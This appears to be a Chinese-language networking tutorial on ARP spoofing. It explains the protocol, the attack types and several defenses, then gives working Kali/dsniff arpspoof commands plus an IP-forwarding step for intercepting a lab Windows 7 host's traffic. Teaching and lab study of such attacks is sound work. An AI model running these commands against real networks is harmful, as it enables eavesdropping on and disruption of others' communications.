1-ARP欺骗及攻击

一、ARP协议

ARP(Address Resolution Protocol,地址解析协议)是一种用于通过网络层地址(比如IP地址)获取链路层地址(比如MAC地址)的通信协议。它将网络层的IP地址与数据链路层的MAC地址相互映射,使得在计算机进行网络通信时,能够正确地将数据包发送到对应的目标主机

二、ARP协议工作流程

  1. 当计算机需要向某个目的主机发送数据时,首先在本地ARP缓存(ARP Cache)中查找是否有目标IP地址对应的MAC地址。
  2. 如果本地ARP缓存中没有对应的MAC地址,则计算机会发送一个广播消息,称为ARP请求(ARP Request),请求目标主机回复其MAC地址。
  3. 当目标主机收到ARP请求后,如果发现自己的IP地址与请求中的IP地址匹配,则会将自己的MAC地址发送回来,称为ARP响应(ARP Reply)。
  4. 发送ARP请求的计算机接收到ARP响应后,将得到目标主机的MAC地址,并将其保存在本地ARP缓存中,以备将来使用。

三、ARP攻击与欺骗

ARP(地址解析协议)欺骗是一种网络攻击技术,攻击者利用这种技术向网络中发送虚假的ARP响应,从而欺骗其他计算机的网络配置。当攻击成功时,攻击者可以将数据流量重定向到自己的计算机上,同时可以窃取敏感信息。

具体来说,ARP欺骗攻击主要有两种方式:

  1. MAC地址欺骗:攻击者在网络中发送虚假的ARP响应,将自己的MAC地址伪装成目标计算机的MAC地址,使其他设备将数据包发送到攻击者的计算机上。
  2. 双边ARP欺骗:攻击者在网络中发送虚假的ARP请求和ARP响应,将两台计算机的MAC地址都伪装成对方的MAC地址,从而使它们之间的通信流量经过攻击者的计算机

1. ARP攻击

主机A要和出口路由器通信,向网络中发送ARP请求,攻击主机C伪装成路由器的IP地址,响应一个虚假的网络中不存在MAC地址66-66给主机A,就会造成主机A无法通信。在这里插入图片描述

2、ARP欺骗

欺骗网关
攻击主告诉A主机的是真实存在的MAC地址。
攻击主机C开启IP转发功能 ,接受A主机发送的信息,之后再将信息转发给出口路由器,以实现数据监听功能在这里插入图片描述

三、对于ARP攻击与欺骗可采取的措施

  1. 使用静态ARP缓存记录,从而避免频繁的ARP查询和响应。
  2. 确认网络中所有计算机的真实MAC地址,并使用网络访问控制列表(ACL)限制不受信任的计算机的访问。
  3. 启用网络中的端口安全功能,只允许已知的MAC地址访问网络。
  4. 在网络中使用安全协议(如SSL、SSH等)来加密数据,从而防止被窃取。

四、实施ARP欺骗与攻击

工具:虚拟机、kali、windows7、dsniff工具

1、 kali配置

配置源及工具安装

root权限运行
 - vim /etc/apt/sources.list
	# 在打开的文件里插入下面的镜像源 
	// 1.按小写o --插入 
	// 2.按#号把原来的注释掉 
	// 3.按ESC 取消插入在 按:和 wq  ----保存
2.清华大学镜像源
deb http://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free
deb-src https://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free
3.apt-get update  // 更新一下镜像源
4.apt-get install dsniff   //安装工具

2.攻击

攻击
arpspoof -i eth0 -t 192.168.204.130 192.168.204.2

  • 其中eth0是kali主机的网卡名称 (命令–ifconfig即可查看 )
  • -t 后面的内容是要攻击的主机的ip地址和MAC地址(攻击的是虚拟机中的windows7,命令–ipconfig查看地址)
    在这里插入图片描述
    攻击前可以访问网络在这里插入图片描述

攻击后访问不了在这里插入图片描述欺骗

另外再打开一个命令终端输入echo 1 >> /proc/sys/net/ipv4/ip_forward
开启IP转发功能,此时被攻击主机可以上网,但kali可以监听被攻击主机的信息在这里插入图片描述

在这里插入图片描述